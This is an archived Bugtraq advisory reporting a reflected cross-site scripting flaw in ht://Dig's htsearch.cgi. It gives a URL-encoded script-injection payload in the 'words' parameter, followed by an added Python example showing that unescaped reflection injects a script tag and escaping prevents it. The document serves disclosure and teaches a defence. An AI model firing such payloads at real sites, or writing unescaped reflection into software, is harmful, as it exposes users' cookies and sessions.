Bugtraq mailing list archives
XSS in HTDIG
From: Howard Yeend <h_bugtraq () yahoo com>
Date: Wed, 26 Jun 2002 01:38:48 -0700 (PDT)
E.g.:

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLs must be on one line)

Apologies if this is a known issue. Apologies also for posting about XSS, too, but this is not an isolated website, but a commonly used service.
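Added example, not part of the original post and not ht://Dig code: it decodes the `words` value from the URL above and reflects it into a page with and without HTML encoding, then parses both results to show which tags a browser-style parser would see. The template and all function names are constructed for illustration, and the assumption that the term is echoed inside a double-quoted attribute is inferred from the payload's leading `">`.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# URL quoted in the post (anyhost.com is the post's own placeholder host).
REPORTED_URL = ("http://www.anyhost.com/cgi-bin/htsearch.cgi?words="
                "%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E")

# Constructed template: assumes the search term is echoed back inside a
# double-quoted attribute, which is what the payload's leading "> suggests.
TEMPLATE = '<form><input type="text" name="words" value="{words}"></form>'

def words_param(url):
    """Return the percent-decoded value of the 'words' query parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["words"][0]

def render_unescaped(words):
    """Reflect the parameter verbatim (the behaviour the post reports)."""
    return TEMPLATE.format(words=words)

def render_escaped(words):
    """Encode &, <, > and both quote characters before reflecting."""
    return TEMPLATE.format(words=escape(words, quote=True))

class TagCollector(HTMLParser):
    """Record each start tag and the value attribute of the input field."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")

def parse(html_text):
    """Parse rendered output and return the collector with what it saw."""
    collector = TagCollector()
    collector.feed(html_text)
    collector.close()
    return collector

if __name__ == "__main__":
    term = words_param(REPORTED_URL)
    for render in (render_unescaped, render_escaped):
        seen = parse(render(term))
        print(render.__name__, seen.tags, repr(seen.input_value))
```

In the unescaped rendering the attribute closes early and a script element appears in the document; in the escaped rendering the whole term stays inside the input's value.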